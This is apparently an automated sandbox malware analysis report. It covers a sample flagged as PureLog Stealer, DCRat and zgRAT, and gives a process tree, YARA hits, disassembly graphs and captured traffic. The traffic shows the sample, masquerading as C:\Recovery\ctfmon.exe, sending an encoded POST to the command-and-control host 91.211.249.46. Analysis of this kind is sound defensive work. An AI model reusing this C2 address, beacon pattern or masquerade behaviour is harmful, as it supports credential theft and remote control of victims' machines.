                                                  Jan 12, 2025 09:17:21.757888079 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:17:21.762644053 CET804973191.211.249.46192.168.2.4
                                                  Jan 12, 2025 09:17:22.103302956 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:17:22.109235048 CET804973191.211.249.46192.168.2.4
                                                  Jan 12, 2025 09:17:22.362692118 CET804973191.211.249.46192.168.2.4
                                                  Jan 12, 2025 09:17:22.415091991 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:18:37.364954948 CET804973191.211.249.46192.168.2.4
                                                  Jan 12, 2025 09:18:37.365201950 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:19:02.385298014 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:19:02.390564919 CET804973191.211.249.46192.168.2.4

                                                  HTTP Request Dependency Graph

                                                  • 91.211.249.46

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973191.211.249.46803384C:\Recovery\ctfmon.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 12, 2025 09:17:21.757888079 CET363OUTPOST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 91.211.249.46
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 12, 2025 09:17:22.103302956 CET344OUTData Raw: 05 02 04 06 03 0c 01 05 05 06 02 01 02 0c 01 03 00 0b 05 09 02 00 03 09 00 54 0f 54 04 03 01 06 0f 01 04 0d 01 05 03 06 0e 0a 05 00 07 51 07 02 06 06 0b 09 0c 0f 04 06 05 04 05 02 05 04 06 09 01 02 0d 5e 07 03 05 06 0d 57 0c 57 0c 04 0e 04 02 07
                                                  Data Ascii: TTQ^WWURTU\L~|pXtaBaK|hob^tkXkZ[o`_o`P}^NwtpA~u~V@x}PN~ru
                                                  Jan 12, 2025 09:17:22.362692118 CET696INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Sun, 12 Jan 2025 08:17:22 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:03:17:04
                                                  Start date:12/01/2025
                                                  Path:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\85D5ktqjpd.exe"
                                                  Imagebase:0xd70000
                                                  File size:4'515'328 bytes
                                                  MD5 hash:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:03:17:08
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat"
                                                  Imagebase:0x7ff78c4b0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:03:17:08
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:03:17:09
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff6c78a0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:03:17:09
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff774ce0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:03:17:18
                                                  Start date:12/01/2025
                                                  Path:C:\Recovery\ctfmon.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\ctfmon.exe"
                                                  Imagebase:0xa00000
                                                  File size:4'515'328 bytes
                                                  MD5 hash:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:5.9%
                                                    Dynamic/Decrypted Code Coverage:81.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:16
                                                    Total number of Limit Nodes:0
                                                    execution_graph 24573 7ffd9b8b0708 24574 7ffd9b8c2e70 24573->24574 24575 7ffd9b8c321d VirtualAlloc 24574->24575 24576 7ffd9b8c3275 24575->24576 24577 7ffd9ba70050 24578 7ffd9ba7008b ResumeThread 24577->24578 24580 7ffd9ba70164 24578->24580 24581 7ffd9ba6e84d 24582 7ffd9ba6e85b SuspendThread 24581->24582 24584 7ffd9ba6e934 24582->24584 24585 7ffd9ba701b9 24586 7ffd9ba701c7 CloseHandle 24585->24586 24588 7ffd9ba702a4 24586->24588 24569 7ffd9ba71e95 24570 7ffd9ba71ee2 GetFileAttributesW 24569->24570 24572 7ffd9ba71f75 24570->24572

                                                    Executed Functions

                                                    Function 00007FFD9B8BEBA0 Relevance: .7, Instructions: 693COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 316 7ffd9b8beba0-7ffd9b8bebac 317 7ffd9b8bebf6-7ffd9b8bec0c 316->317 318 7ffd9b8bebae-7ffd9b8bebdd 316->318 321 7ffd9b8bf423-7ffd9b8bf45b 317->321 322 7ffd9b8bec12-7ffd9b8bec41 317->322 319 7ffd9b8bebdf 318->319 320 7ffd9b8bebe4-7ffd9b8bebf5 318->320 319->320 320->317 326 7ffd9b8bfdf4-7ffd9b8bfe01 321->326 328 7ffd9b8bfe07-7ffd9b8bfe12 326->328 329 7ffd9b8bf460-7ffd9b8bf46f 326->329 330 7ffd9b8bf476-7ffd9b8bf5e0 call 7ffd9b8b1310 329->330 331 7ffd9b8bf471 329->331 344 7ffd9b8bf654-7ffd9b8bf6f4 330->344 345 7ffd9b8bf5e2-7ffd9b8bf620 330->345 331->330 354 7ffd9b8bf6f6-7ffd9b8bf763 344->354 355 7ffd9b8bf765-7ffd9b8bf7ad call 7ffd9b8b1310 344->355 349 7ffd9b8bf62b-7ffd9b8bf64f 345->349 352 7ffd9b8bfdec-7ffd9b8bfdf1 349->352 352->326 361 7ffd9b8bf7b8-7ffd9b8bf7be 354->361 355->361 363 7ffd9b8bf840-7ffd9b8bf84d 361->363 364 7ffd9b8bf7c3-7ffd9b8bf7ea 363->364 365 7ffd9b8bf853-7ffd9b8bf905 363->365 366 7ffd9b8bf7ec 364->366 367 7ffd9b8bf7f1-7ffd9b8bf83d 364->367 374 7ffd9b8bfb82-7ffd9b8bfb88 365->374 366->367 367->363 375 7ffd9b8bf90a-7ffd9b8bf90e 374->375 376 7ffd9b8bfb8e-7ffd9b8bfba1 374->376 377 7ffd9b8bf92b-7ffd9b8bfb2c 375->377 378 7ffd9b8bf910-7ffd9b8bf927 375->378 379 7ffd9b8bfba2-7ffd9b8bfbac 376->379 384 7ffd9b8bfb2f-7ffd9b8bfb31 377->384 378->377 383 7ffd9b8bfbb1-7ffd9b8bfbb9 379->383 388 7ffd9b8bfc2a 383->388 389 7ffd9b8bfbba-7ffd9b8bfbbd 383->389 384->379 385 7ffd9b8bfb33-7ffd9b8bfb35 384->385 385->383 387 7ffd9b8bfb37 385->387 390 7ffd9b8bfb39 387->390 391 7ffd9b8bfabe 387->391 394 7ffd9b8bfc2b-7ffd9b8bfc33 388->394 392 7ffd9b8bfc39-7ffd9b8bfc4b 389->392 393 7ffd9b8bfbbf 389->393 396 7ffd9b8bfb3e 390->396 391->384 395 7ffd9b8bfac0-7ffd9b8bfac2 391->395 399 7ffd9b8bfcbc-7ffd9b8bfcc0 392->399 400 7ffd9b8bfc4d-7ffd9b8bfc4f 392->400 397 7ffd9b8bfb46 393->397 398 7ffd9b8bfbc0-7ffd9b8bfbc2 393->398 394->392 395->396 401 7ffd9b8bfac4 395->401 396->389 402 7ffd9b8bfb40-7ffd9b8bfb44 396->402 404 7ffd9b8bfb48 397->404 405 7ffd9b8bfacd 397->405 403 7ffd9b8bfbd8-7ffd9b8bfc1e 398->403 406 7ffd9b8bfccb-7ffd9b8bfcd4 399->406 400->406 407 7ffd9b8bfc51 400->407 408 7ffd9b8bfac6 401->408 409 7ffd9b8bfa4b-7ffd9b8bfa4d 401->409 402->397 402->398 415 7ffd9b8bfc73-7ffd9b8bfc9e 403->415 422 7ffd9b8bfc20-7ffd9b8bfc28 403->422 411 7ffd9b8bfb4d-7ffd9b8bfb74 404->411 410 7ffd9b8bface-7ffd9b8bfad1 405->410 412 7ffd9b8bfcd6 406->412 413 7ffd9b8bfd45-7ffd9b8bfd55 406->413 407->403 414 7ffd9b8bfc53 407->414 408->405 409->410 421 7ffd9b8bfa4f 409->421 410->411 417 7ffd9b8bfad3 410->417 425 7ffd9b8bfb7a-7ffd9b8bfb7f 411->425 418 7ffd9b8bfd0f 412->418 419 7ffd9b8bfd57-7ffd9b8bfd59 413->419 420 7ffd9b8bfdc6-7ffd9b8bfdd4 413->420 414->415 415->418 433 7ffd9b8bfca0-7ffd9b8bfca4 415->433 423 7ffd9b8bfad5 417->423 424 7ffd9b8bfa5a-7ffd9b8bfa5c 417->424 418->413 426 7ffd9b8bfdd5-7ffd9b8bfdea 419->426 427 7ffd9b8bfd5b-7ffd9b8bfd5d 419->427 420->426 421->424 422->388 429 7ffd9b8bfadd-7ffd9b8bfb04 423->429 424->429 431 7ffd9b8bfa5e-7ffd9b8bfa8e 424->431 425->374 426->352 427->420 429->425 431->425 433->394 437 7ffd9b8bfca6 433->437 437->399
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74c8f06068263d4ff3941ca238d6cef4c1908eadc3a5dc043cdf573c5a070998
                                                    • Instruction ID: b2cf52c5fc5484c35961cb759015353a17286d10dcf70a098e7762c4be5cb304
                                                    • Opcode Fuzzy Hash: 74c8f06068263d4ff3941ca238d6cef4c1908eadc3a5dc043cdf573c5a070998
                                                    • Instruction Fuzzy Hash: 9742B870E0992D8FDBA9DB58C8A5BA9B7B5FB58301F1101E9D40DD72A1DB34AE81CF40
                                                    Function 00007FFD9B8B0D67 Relevance: .3, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dfa883c8dc1529f09cf3d74d82d2f797c79e917f68b102998d6b1c127e30c899
                                                    • Instruction ID: 0ffec8cbc3e4bbaa1b1ad34cd5728703aa0945672d8c88591b6e750b149a9d89
                                                    • Opcode Fuzzy Hash: dfa883c8dc1529f09cf3d74d82d2f797c79e917f68b102998d6b1c127e30c899
                                                    • Instruction Fuzzy Hash: 9CA1D171A18AAD8FE798DB68C8657A97FF1FF4A304F4001BAD089D72D6CB782401CB41
                                                    Function 00007FFD9B8B0708 Relevance: 1.7, APIs: 1, Instructions: 478memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: ac88240fe5d71e30ff34d7d6b495a23ab3fdea21f3ee5aa473a44a70f28c61d3
                                                    • Instruction ID: e9ac313f8e494426e7b4acbfa90e3e3868a710186d4ae70b793a07a6ed31d0ad
                                                    • Opcode Fuzzy Hash: ac88240fe5d71e30ff34d7d6b495a23ab3fdea21f3ee5aa473a44a70f28c61d3
                                                    • Instruction Fuzzy Hash: 2AF19F70E1964D8FDB95EFA8C855AED7BF0FF59300F0101AAE448D32A6DB34A985CB41
                                                    Function 00007FFD9BA70050 Relevance: 1.7, APIs: 1, Instructions: 161threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 75 7ffd9ba70050-7ffd9ba70089 76 7ffd9ba7008b 75->76 77 7ffd9ba7008c-7ffd9ba70162 ResumeThread 75->77 76->77 80 7ffd9ba70164 77->80 81 7ffd9ba7016a-7ffd9ba701b4 77->81 80->81
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 7a542eed754a235f5d43558557eefbcbb31a3033dbdc61b3cf81c4ce39b4dd33
                                                    • Instruction ID: 4554601ce41c7ccd2292e81752f4f0a9c33ef6e5e4216491aeb6eb2def92d2d7
                                                    • Opcode Fuzzy Hash: 7a542eed754a235f5d43558557eefbcbb31a3033dbdc61b3cf81c4ce39b4dd33
                                                    • Instruction Fuzzy Hash: 0E518D70E0C78C8FDB59DFA8D894AE9BBF0EF56310F1441ABD049D7292DA749846CB11
                                                    Function 00007FFD9BA6E84D Relevance: 1.6, APIs: 1, Instructions: 138threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 84 7ffd9ba6e84d-7ffd9ba6e859 85 7ffd9ba6e864-7ffd9ba6e932 SuspendThread 84->85 86 7ffd9ba6e85b-7ffd9ba6e863 84->86 89 7ffd9ba6e934 85->89 90 7ffd9ba6e93a-7ffd9ba6e984 85->90 86->85 89->90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: d7acdb767b9622d38aa65f396652bda4545e3ea4c6a736b9d86e7f4135352a85
                                                    • Instruction ID: 7e2a8cfd7df9acd232085a3eb249f30934f65ba5e26913941ae8fbc75328ff15
                                                    • Opcode Fuzzy Hash: d7acdb767b9622d38aa65f396652bda4545e3ea4c6a736b9d86e7f4135352a85
                                                    • Instruction Fuzzy Hash: FF415E70E0864C8FDB98DF98D894BEDBBF0FF5A310F10416AD049E7292DA74A445CB41
                                                    Function 00007FFD9BA71E95 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 93 7ffd9ba71e95-7ffd9ba71f73 GetFileAttributesW 96 7ffd9ba71f7b-7ffd9ba71fb9 93->96 97 7ffd9ba71f75 93->97 97->96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: acd8e0a037a1148b3eaf9644b168645d347b5b9007919b6ba782677d53663dee
                                                    • Instruction ID: c24433b3907583b1de9eeec29471d5b2d77c3868f82c104ddc02b4beb2667d5c
                                                    • Opcode Fuzzy Hash: acd8e0a037a1148b3eaf9644b168645d347b5b9007919b6ba782677d53663dee
                                                    • Instruction Fuzzy Hash: BE410A70E0861C8FDB98DF98D485BEDBBF0EB69310F10416AD40DE7252DA71A846CF51
                                                    Function 00007FFD9BFBD584 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N^H
                                                    • API String ID: 0-4206628934
                                                    • Opcode ID: 7d75ce6c0a8d40e5869681254ad164e41894542b1abf68c73dde0f2e441b04db
                                                    • Instruction ID: b3c004b8cec1c178c0455f3ceaf38a1315d16f7b3cdbdc33f3212ebfb77c756f
                                                    • Opcode Fuzzy Hash: 7d75ce6c0a8d40e5869681254ad164e41894542b1abf68c73dde0f2e441b04db
                                                    • Instruction Fuzzy Hash: 1891D435B0EA9D4FE795DF6888746A87BE1EF45300F0901FAD04DC75E2DE29A9058B02
                                                    Function 00007FFD9BFBC7A9 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 157 7ffd9bfbc7a9-7ffd9bfbc7ab 158 7ffd9bfbc82c-7ffd9bfbc831 157->158 159 7ffd9bfbc7ad-7ffd9bfbc7b1 157->159 162 7ffd9bfbc832-7ffd9bfbc835 158->162 160 7ffd9bfbc7b3-7ffd9bfbc7b6 159->160 161 7ffd9bfbc822-7ffd9bfbc823 159->161 160->162 165 7ffd9bfbc7b8 160->165 163 7ffd9bfbc89f 161->163 164 7ffd9bfbc824 161->164 166 7ffd9bfbc836-7ffd9bfbc848 162->166 171 7ffd9bfbc910 163->171 172 7ffd9bfbc8a0-7ffd9bfbc8a1 163->172 167 7ffd9bfbc895-7ffd9bfbc898 164->167 168 7ffd9bfbc825-7ffd9bfbc829 164->168 169 7ffd9bfbc7ba-7ffd9bfbc7c5 165->169 170 7ffd9bfbc7ff-7ffd9bfbc819 165->170 185 7ffd9bfbc84c-7ffd9bfbc855 166->185 180 7ffd9bfbc899 167->180 181 7ffd9bfbc914-7ffd9bfbc919 167->181 174 7ffd9bfbc8a5 168->174 175 7ffd9bfbc82b 168->175 169->166 178 7ffd9bfbc7c7-7ffd9bfbc7cb 169->178 201 7ffd9bfbc81b-7ffd9bfbc81d 170->201 202 7ffd9bfbc88a-7ffd9bfbc893 170->202 176 7ffd9bfbc89d-7ffd9bfbc89e 171->176 177 7ffd9bfbc912 171->177 173 7ffd9bfbc8a2-7ffd9bfbc8a4 172->173 173->174 182 7ffd9bfbc926-7ffd9bfbc92a 174->182 183 7ffd9bfbc8a6 174->183 175->158 184 7ffd9bfbc872-7ffd9bfbc887 175->184 176->163 187 7ffd9bfbc91a 176->187 177->181 178->185 186 7ffd9bfbc7cd-7ffd9bfbc7d0 178->186 180->187 188 7ffd9bfbc89a 180->188 181->187 192 7ffd9bfbc92c 182->192 193 7ffd9bfbc931-7ffd9bfbc943 182->193 190 7ffd9bfbc8a7-7ffd9bfbc8ac 183->190 191 7ffd9bfbc8ed-7ffd9bfbc8ff 183->191 184->202 197 7ffd9bfbc857 185->197 198 7ffd9bfbc8c6-7ffd9bfbc8d4 185->198 186->185 194 7ffd9bfbc7d2-7ffd9bfbc7d7 186->194 195 7ffd9bfbc975-7ffd9bfbc976 187->195 196 7ffd9bfbc91c-7ffd9bfbc924 187->196 199 7ffd9bfbc89b-7ffd9bfbc89c 188->199 200 7ffd9bfbc8e1-7ffd9bfbc8e6 188->200 209 7ffd9bfbc8ae-7ffd9bfbc8c3 190->209 214 7ffd9bfbc905 191->214 192->193 204 7ffd9bfbc858-7ffd9bfbc859 194->204 205 7ffd9bfbc7d9-7ffd9bfbc7fe 194->205 196->182 197->204 215 7ffd9bfbc8d5 198->215 199->176 211 7ffd9bfbc8e7-7ffd9bfbc8ec 200->211 201->180 208 7ffd9bfbc81f 201->208 206 7ffd9bfbc90f 202->206 207 7ffd9bfbc894 202->207 204->215 216 7ffd9bfbc85a 204->216 205->170 206->171 207->167 207->214 212 7ffd9bfbc866 208->212 213 7ffd9bfbc821 208->213 209->198 211->191 212->211 217 7ffd9bfbc867 212->217 213->161 214->196 220 7ffd9bfbc8db-7ffd9bfbc8dd 215->220 216->220 221 7ffd9bfbc85b 216->221 217->209 222 7ffd9bfbc868-7ffd9bfbc871 217->222 220->200 221->173 223 7ffd9bfbc85c-7ffd9bfbc85f 221->223 222->184 223->220 224 7ffd9bfbc861-7ffd9bfbc865 223->224 224->200 224->212
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [^H
                                                    • API String ID: 0-2846327662
                                                    • Opcode ID: f5cee2ca3bdc79c5f30ec3dd3d44b7ba509e67758944cd2491839d51ee3e421f
                                                    • Instruction ID: 1b423c1c3517d78b72a9c4bdbd61317fad53776130071a9101adb739ac868ca4
                                                    • Opcode Fuzzy Hash: f5cee2ca3bdc79c5f30ec3dd3d44b7ba509e67758944cd2491839d51ee3e421f
                                                    • Instruction Fuzzy Hash: 40713931B0E45D5FE778DE5888665B637C0FF44311B060379D29EC75B2DE29EA0A8B81
                                                    Function 00007FFD9BFB3718 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 225 7ffd9bfb3718-7ffd9bfb3730 227 7ffd9bfb3738-7ffd9bfb3763 225->227 231 7ffd9bfb378c-7ffd9bfb3792 227->231 232 7ffd9bfb3799-7ffd9bfb379f 231->232 233 7ffd9bfb3765-7ffd9bfb377e 232->233 234 7ffd9bfb37a1-7ffd9bfb37a3 232->234 235 7ffd9bfb3875-7ffd9bfb3885 233->235 236 7ffd9bfb3784-7ffd9bfb3789 233->236 237 7ffd9bfb37a6 234->237 245 7ffd9bfb3887 235->245 246 7ffd9bfb3888-7ffd9bfb38d6 235->246 236->231 238 7ffd9bfb37ac-7ffd9bfb37b7 237->238 239 7ffd9bfb3693-7ffd9bfb36d8 237->239 238->237 243 7ffd9bfb37b9-7ffd9bfb37e1 238->243 239->232 244 7ffd9bfb36de-7ffd9bfb36e4 239->244 247 7ffd9bfb3695-7ffd9bfb386d 244->247 248 7ffd9bfb36e6 244->248 245->246 247->235 252 7ffd9bfb370f-7ffd9bfb3716 248->252 252->225 254 7ffd9bfb36e8-7ffd9bfb3701 252->254 254->235 257 7ffd9bfb3707-7ffd9bfb370c 254->257 257->252
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: d82c70ce895d23bbd748507a6f9bedbdb2f2e7356ff7b81a15db659c2966743c
                                                    • Instruction ID: 868676a0c7095575da743e7dff139239d617411b1010bc3d592ae42d7bc0a77e
                                                    • Opcode Fuzzy Hash: d82c70ce895d23bbd748507a6f9bedbdb2f2e7356ff7b81a15db659c2966743c
                                                    • Instruction Fuzzy Hash: DD516D71E0961E8FDB68CF98C4645ACB7B1EF44300F1142BEC11EE72A1DA366905CB41
                                                    Function 00007FFD9BFBF818 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
